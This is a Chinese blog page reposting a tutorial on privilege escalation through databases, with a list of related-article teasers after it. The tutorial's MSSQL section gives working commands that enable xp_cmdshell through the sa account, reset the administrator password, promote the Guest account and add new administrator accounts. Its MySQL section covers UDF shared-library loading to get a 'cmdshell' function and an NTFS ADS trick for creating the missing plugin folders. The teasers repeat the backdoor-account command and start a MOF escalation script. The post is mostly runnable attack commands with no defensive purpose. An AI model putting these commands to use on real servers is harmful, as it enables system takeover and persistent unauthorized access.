mysql mmsql 提权区别_【汇总】数据库提权(mysql、mssql)

最新推荐文章于 2024-07-13 22:05:55 发布
最新推荐文章于 2024-07-13 22:05:55 发布
阅读量93 收藏
点赞数
文章标签: mysql mmsql 提权区别
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36477752/article/details/113283605
版权
本文介绍了如何利用MSSQL的sa账号和MySQL的UDF进行提权。在MSSQL中,通过启用xp_cmdshell执行命令,包括修改管理员密码、增加用户权限等。而在MySQL中,主要讲述如何上传UDF到不同版本的MySQL路径,通过创建函数实现命令执行。还提到了利用NTFS ADS流创建文件夹以解决Can't open shared library的问题。
摘要由CSDN通过智能技术生成

日期:2018-04-03 11:46:45

作者:Bay0net

介绍:利用 mssql 的 sa 账号提权、利用 MySQL 的 UDF 提权

0x01、mssql 提权

恢复 xp_cmdshell

几个命令

# 查看是否存在 xp_cmdshell(返回非 0 即存在)

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';

# 不存在的话可以添加

EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int;

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll';

# 查看是否开启了 xp_cmdshell(试试命令是否能成功)

Exec master..xp_cmdshell 'whoami';

命令执行

利用 sa 连接到服务器,然后执行命令

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

提示成功

da120857251fda7b56fa540b354ecfb8.png

然后利用 sqltools 直接执行命令。

8188337119e663dd1964d240a040a8c6.png

也可以用 SQL 语句来执行命令,三种方式,一般都喜欢用第二种。

exec xp_cmdshell 'command';

exec master..xp_cmdshell 'command';

exec master.dbo.xp_cmdshell 'command';

修改 administrators 的密码,比较方便

exec xp_cmdshell 'net user administrator test123...';

修改 Guest 的权限

exec xp_cmdshell 'net user Guest test123...';

exec xp_cmdshell 'net user Guest /active:yes';

exec xp_cmdshell 'net localgroup administrators Guest /add';

新建用户

exec master..xp_cmdshell 'net user test test123... /add';

exec master..xp_cmdshell 'net localgroup administrators test /add';

0x02、MySQL 提权

上传 UDF

这一步和 MySQL 的版本有关系,不同版本上传的路径不一样,没有 lib 文件的话需要新建。

# 版本小于 5.1,上传到系统目录下

C:\\WINDOWS\\udf.dll

C:\\WINDOWS\\system32\\udf.dll

# 版本大于 5.1,上传到安装目录下

%mysql%\\plugin\\udf.dll

# 查询路径,后面加 udf.dll 即可

select @@plugin_dir

# 常用

# 查询用户

select user()

# 查询数据库版本

select version()

# 查询当前操作系统

select @@version_compile_os

# 查询读取数据库路径

select @@datadir

# 查询MYSQL安装路径

select @@basedir

# 查询 plugin 的路径

select @@plugin_dir

命令执行

Create Function cmdshell returns string soname 'udf.dll';

select cmdshell('ipconfig');

drop function cmdshell;

delete from mysql.func where name='cmdshell'

可以直接 UDF 提权工具搞,新建用户然后直接 3389 即可。

利用 NTFS ADS 写文件

使用 NTFS ADS 流创建 lib、plugin 文件夹:

如果遇到 Can't open shared library 的情况,

就需要把 udf.dll 导出到 lib\plugin 目录下才可以,但是默认情况下 plugin 不存在,就利用 NTFS ADS 流来创建文件夹。

select @@basedir; //查找mysql的目录

select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'; //使用NTFS ADS流创建lib目录

select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS再次创建plugin目录

执行成功以后再进行导出即可。

becomingdevops
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql 2008提权_通过Mssql提权的几种姿势
weixin_33134753的博客
02-26 323
本文记录针对SQL Server数据库,在拿到shell之后进行提权的5种方法。一、 xp_cmdshell提权上面的数据库连接需要知道sa的密码,连接之后,在下面的sql命令处执行:exec xp_cmdshell 'net user aaa aaa /add && net localgroup administrators aaa /add'就能成功的创建一个账户aaa并且加到...
mssql 连接mysql_Mssql链接mysql数据库
weixin_27014595的博客
01-19 1118
最近在做mysql数据库实时同步到mssql数据库的方案,花了一周时间,测试通过了,在实际机器上测试出现了若干问题。第一个问题就是在mssql上链接mysql的问题。第一步,安装 Mysql ODBC首先要在mssql的机器上安装mysql ODBC,如果没有安装将报错:但安装不一定就能成功,比如会报错1918:出现这种情况的原因是服务器上没有安装运行库,安装 MS C++2010后,再安装ODB...
mysql mmsql 提权区别_mysql 提权总结
weixin_42402188的博客
01-27 149
1.MOF提权简单的说mof就是系统内部的一个程序,每隔一定时间系统就会以root权限去执行,我们将其替换然后执行我们的而已攻击代码。此举称之为mof提权。以下便是脚本:1 #pragma namespace("\\\\.\\root\\subscription")23 instance of __EventFilter as$EventFilter4 {5 EventNamespace ...
mmsqlmysql整理
maqiao007的博客
05-08 938
最近做项目数据库sqlserver转成mysql,遇到一些问题,整理如下 1."Unable to convert MySQL date/time value to System.DateTime"   日期这是因为在日期列中有"0000-00-00"数据值,要修正这个问题,你可以把  这些数据设为null,或者在连接字符串中设置"Allow Zero Datetime=True" 例:
mssqlmysql_mysql和mssql对比
weixin_39872044的博客
01-18 376
由于工作原因,程序需要适配两种类型的数据库,所以把一些sql语句写法对比总结一下本篇及后续随笔都将使用一个极其简单的场景(课室,学生,1对多)来演示,请先创建表mysqlCREATE TABLE IF NOT EXISTS `class` (`Id` int(11) NOT NULL,`Name` varchar(50) NOT NULL DEFAULT '0',PRIMARY KEY (`Id`...
mysql mmsql 提权区别_通过Mysql提权的几种姿势
weixin_29496633的博客
01-19 101
本文记录利用mysql数据库,在拿到shell之后进行提权的两种方法。一、UDF提权原理:UDF是mysql的一个拓展接口,UDF(Userdefined function)让用户通过该接口可以自定义mysql函数。UDF 定义需要DLL动态链接库文件支持。基本步骤:1、导出udf.dll文件到指定目录(有些webshell集成,直接导 出即可,没有,则需要上传)2、基于udf.dll创建自定义函...
简单的Mysql/Mssql应用程序提权
m0_74326506的博客
07-13 2058
UDF是用户自定义函数,其为mysql的一个拓展接口,可以为mysql增添一些函数。比如mysql一些函数没有,则可以自己用UDF加函数进去,加了之后就可以创建使用
MSSQL注入手工注入mssql提权
代码审计
04-18 2253
mssql数据库 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql使用的函数在mssql中有些会起不到作用点。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信息,用户登录信息,系统运行状态 model 模板数据库数据库时建立所有数据库的模板。 tempdb 临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件 msdb 主要为用户使用,记录着计划
MSSQLMySQL最好用的转换工具(数据库搬家喽)
08-24
MSSQLMySQL是两种广泛应用的关系型数据库管理系统。本文将深入探讨如何使用特定的转换工具进行MSSQLMySQL的数据迁移,以及这个过程中的关键知识点。 标题提及的"MSSQLMySQL最好用的转换工具"是指一个专为...
Enumdb:一款针对MySQL和MSSQL关系型数据库的安全渗透后利用工具
ALLEN'Blog
04-04 329
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Mysql 与Mssql 的语法区别
leo_de_log的博客
08-15 985
Mysql 与Mssql 的语法区别 今天刷Letcode的数据库题目,看到第二个题目:查找第二高薪水的时候看见有Limit这个用法,当时并没有关于Limit的一点印象.之后在W3上看到这是Mysql的单独语法。原来我以为SQL 的基础查询语句都是一样的,只是一个开源一个不开源。 现在归总一下两个数据库语法的差异点: mysql支持enum,和set类型,sql server不支持 # mys...
2024-2030全球与中国硅胶婴儿用品市场现状及未来发展趋势 Sample-Li Jinpan.pdf
09-05
QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。
用于非线性模型预测控制 (NMPC) 的并行优化工具包.7z
09-05
用于非线性模型预测控制 (NMPC) 的并行优化工具包.7z
Flow-Guided-Feature-Aggregation研究基于视频的目标检测FGFA框架.zip
最新发布
09-05
目标检测(Object Detection)是计算机视觉领域的一个核心问题,其主要任务是找出图像中所有感兴趣的目标(物体),并确定它们的类别和位置。以下是对目标检测的详细阐述: 一、基本概念 目标检测的任务是解决“在哪里?是什么?”的问题,即定位出图像中目标的位置并识别出目标的类别。由于各类物体具有不同的外观、形状和姿态,加上成像时光照、遮挡等因素的干扰,目标检测一直是计算机视觉领域最具挑战性的任务之一。 二、核心问题 目标检测涉及以下几个核心问题: 分类问题:判断图像中的目标属于哪个类别。 定位问题:确定目标在图像中的具体位置。 大小问题:目标可能具有不同的大小。 形状问题:目标可能具有不同的形状。 三、算法分类 基于深度学习的目标检测算法主要分为两大类: Two-stage算法:先进行区域生成(Region Proposal),生成有可能包含待检物体的预选框(Region Proposal),再通过卷积神经网络进行样本分类。常见的Two-stage算法包括R-CNN、Fast R-CNN、Faster R-CNN等。 One-stage算法:不用生成区域提议,直接在网络中提取特征来预测物体分类和位置。常见的One-stage算法包括YOLO系列(YOLOv1、YOLOv2、YOLOv3、YOLOv4、YOLOv5等)、SSD和RetinaNet等。 四、算法原理 以YOLO系列为例,YOLO将目标检测视为回归问题,将输入图像一次性划分为多个区域,直接在输出层预测边界框和类别概率。YOLO采用卷积网络来提取特征,使用全连接层来得到预测值。其网络结构通常包含多个卷积层和全连接层,通过卷积层提取图像特征,通过全连接层输出预测结果。 五、应用领域 目标检测技术已经广泛应用于各个领域,为人们的生活带来了极大的便利。以下是一些主要的应用领域: 安全监控:在商场、银行
习题集计算机原理习题集
09-05
【习题集】计算机原理习题集 计算机原理习题集 习题 一 1.微型计算机的发展经历了哪几个时代?每个时代有哪些主要特点? 2.简述Pentium4 微处理器的处理能力。 3.冯·诺依曼计算机的结构特点是什么? 4.典型微机有哪三大总线?它们传送的是什么信息? 5.什么叫微处理器?什么叫微型计算机?什么叫微型计算机系统?这三者有什么区别和联系? 6.微处理器内部一般由哪些部分组成?各部分的主要功能是什么? 7.试用示意图说明内存单元的地址和内存单元的内容,二者有何联系和区别? 8.高级语言、汇编语言、机器语言有何区别?各有何特点? 9.评价微型计算机性能的主要指标有哪些?试举例说明现在市场主流机型微型计算机的性能参数。 10.现代微型计算机的主板通常由哪些部分组成?主板上的总线扩展插槽有何用途? 习题 二 1.8086CPU从功能上分为哪两个工作部件?每个工作部件的功能、组成和特点分别是什么? 2.8086CPU中有几个通用寄存器,有几个变址寄存器,有几个地址指针寄存器?它们中通常哪几个寄存器可作为地址寄存器使用? 3.8086CPU的标志寄存器中有哪些标志位?它们的含义和作用是什么?
基于Spring Boot框架的尚融宝网络借贷平台.zip
09-05
基于Spring Boot框架的尚融宝网络借贷平台 项目介绍 尚融宝是一个网络借贷信息中介服务平台,致力为高成长人群提供专业的线上信贷及出借撮合服务。行业案例包括人人贷、拍拍贷等。 技术架构 前端 Node.js: Js运行环境 ES6: Js模块化版本 Axios: Ajax请求工具 Vue.js: 前端框架 ElementUI: 前端组件库 Vueelementadmin: 后台管理系统UI集成方案 NuxtJS: 前端服务器 后端 SpringBoot: 微服务开发框架 SpringCloud: 微服务组件库 SpringCloud Alibaba: 阿里微服务组件库 MyBatis Plus: 持久层框架 Swagger2: API接口文档生成工具 LogBack: 日志系统 alibabaeasyExcel: Excel读写框架 Redis: 缓存中间件 MySQL: 关系型数据库 SpringTask: 定时任务 RabbitMQ: 消息中间件 项目结构 前端 srbadmin: 管理平台 srbsi
基于改进YOLOv5检测脑瘤
09-05
mdpi的一篇文章,文章内容是关于结合NLNN和YOLOv5对脑肿瘤进行检测(是检测不是分类也不是分割)的一篇文章,文章里面说清楚了数据集的来源以及如何处理的,可以大致看一看,了解下相关背景以及如何用YOLO检测脑瘤的文章的写法,另外NLNN这个点也有些创意,有点像简化版自注意力机制,可以找找相关代码看看
R 语言数据分析案例:探索零售数据集并进行销售分析.docx
09-05
R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言数据分析案例:探索零售数据集并进行销售分析.docx R 语言
2011年WEB安全注射入侵教程详解
教程分为两个部分,针对不同类型的数据库——MySQL (mmsql) 和 Access。 1. **MySQL (mmsql) 注射**: - **第一步**:寻找并利用具有一定权限的注射漏洞网站,这通常涉及到网站的输入字段存在SQL注入漏洞。 - **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值